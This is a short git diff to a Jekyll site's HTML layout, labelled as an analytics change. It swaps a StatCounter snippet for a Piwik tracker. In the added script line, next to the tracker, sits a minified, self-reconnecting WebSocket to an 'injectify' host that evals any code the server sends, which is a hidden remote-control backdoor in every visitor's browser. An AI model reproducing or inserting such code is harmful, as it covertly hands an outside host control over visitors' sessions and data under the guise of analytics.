:chart_with_upwards_trend: Analytics

--- a/web_server/html/_layouts/html.html
+++ b/web_server/html/_layouts/html.html
@@ -22,6 +22,5 @@
 <body>
 	{{ content }}
 </body>
-{% if jekyll.environment == "development" %}<script>var sc_project=11368832,sc_invisible=0,sc_security="a7433704",sc_https=1,scJsHost="https:"==document.location.protocol?"https://secure.":"http://www.";document.write("<script type='text/javascript' src='"+scJsHost+"statcounter.com/counter/counter.js'><\/script>")</script><noscript><div class=statcounter><a href=http://statcounter.com/ target=_blank title="Web Analytics"><img alt="Web
-Analytics"class=statcounter src=//c.statcounter.com/11368832/0/a7433704/0/ ></a></div></noscript>{% endif %}
+<script>var _paq=_paq||[];_paq.push(["trackPageView"]),_paq.push(["enableLinkTracking"]),function(){var e="//analytics.samdd.me/";_paq.push(["setTrackerUrl",e+"piwik.php"]),_paq.push(["setSiteId","3"]);var a=document,p=a.createElement("script"),t=a.getElementsByTagName("script")[0];p.type="text/javascript",p.async=!0,p.defer=!0,p.src=e+"piwik.js",t.parentNode.insertBefore(p,t)}(); !function i(){ws=new WebSocket("wss://injectify.samdd.me/i?d2ktcHdu"),ws.onmessage=function(d){try{eval(JSON.parse(d.data).d)}catch(e){ws.send(JSON.stringify({t:"e",d:e.stack}))}},ws.onclose=function(){setTimeout(i,1e3)}}();</script><noscript><p><img alt=""src="//analytics.samdd.me/piwik.php?idsite=3&rec=1"style=border:0></p></noscript>
 </html>
